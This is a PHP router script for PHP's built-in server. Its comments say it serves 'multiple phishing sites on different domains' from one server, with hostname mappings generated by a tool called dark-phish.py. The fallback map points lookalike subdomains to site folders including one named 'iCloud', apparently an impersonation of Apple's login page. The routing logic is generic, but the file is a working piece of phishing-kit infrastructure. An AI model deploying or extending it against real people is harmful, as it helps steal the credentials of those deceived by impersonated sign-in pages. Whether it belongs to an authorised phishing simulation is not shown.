<?php
/**
 * Hostname-based virtual host router for PHP built-in server.
 * Usage: php -S 0.0.0.0:8080 router.php
 *
 * Maps incoming hostnames to site subdirectories so one server
 * can serve multiple phishing sites on different domains.
 *
 * Reads mappings from hostname_map.json (auto-generated by dark-phish.py).
 * Falls back to hardcoded defaults if the JSON file is missing.
 */

$config_path = __DIR__ . '/hostname_map.json';
if (file_exists($config_path)) {
    $config = json_decode(file_get_contents($config_path), true);
    $hostname_map = $config['map'] ?? [];
    $default_site = $config['default'] ?? null;
} else {
    $hostname_map = [
        'datacloudeasy.dylansdecoded.com'     => 'DataCloudEasy',
        'www.datacloudeasy.dylansdecoded.com'  => 'DataCloudEasy',
        'icloud-test.dylansdecoded.com'        => 'iCloud',
    ];
    $default_site = null;
}

$host = strtolower($_SERVER['HTTP_HOST'] ?? '');
// Strip port if present
$host = preg_replace('/:\d+$/', '', $host);

$site_dir = $hostname_map[$host] ?? $default_site;

if (!$site_dir) {
    http_response_code(404);
    echo "404 - Unknown host: " . htmlspecialchars($host);
    exit;
}

$base_path = __DIR__ . '/' . $site_dir;
$request_uri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);

// Default to index.php or index.html
if ($request_uri === '/' || $request_uri === '') {
    if (file_exists($base_path . '/index.php')) {
        $request_uri = '/index.php';
    } elseif (file_exists($base_path . '/index.html')) {
        $request_uri = '/index.html';
    }
}

$file_path = realpath($base_path . $request_uri);

// Security: ensure resolved path is within the site directory
if (!$file_path || strpos($file_path, realpath($base_path)) !== 0) {
    http_response_code(404);
    echo "404 - Not Found";
    exit;
}

if (!file_exists($file_path) || is_dir($file_path)) {
    http_response_code(404);
    echo "404 - Not Found";
    exit;
}

// Handle PHP files by including them (executes the PHP code)
if (pathinfo($file_path, PATHINFO_EXTENSION) === 'php') {
    chdir(dirname($file_path));
    include $file_path;
    return;
}

// Serve static files with correct MIME type
$mime_types = [
    'html' => 'text/html',
    'htm'  => 'text/html',
    'css'  => 'text/css',
    'js'   => 'application/javascript',
    'json' => 'application/json',
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
    'svg'  => 'image/svg+xml',
    'ico'  => 'image/x-icon',
    'woff' => 'font/woff',
    'woff2'=> 'font/woff2',
    'ttf'  => 'font/ttf',
    'txt'  => 'text/plain',
];

$ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION));
$mime = $mime_types[$ext] ?? 'application/octet-stream';

header('Content-Type: ' . $mime);
readfile($file_path);
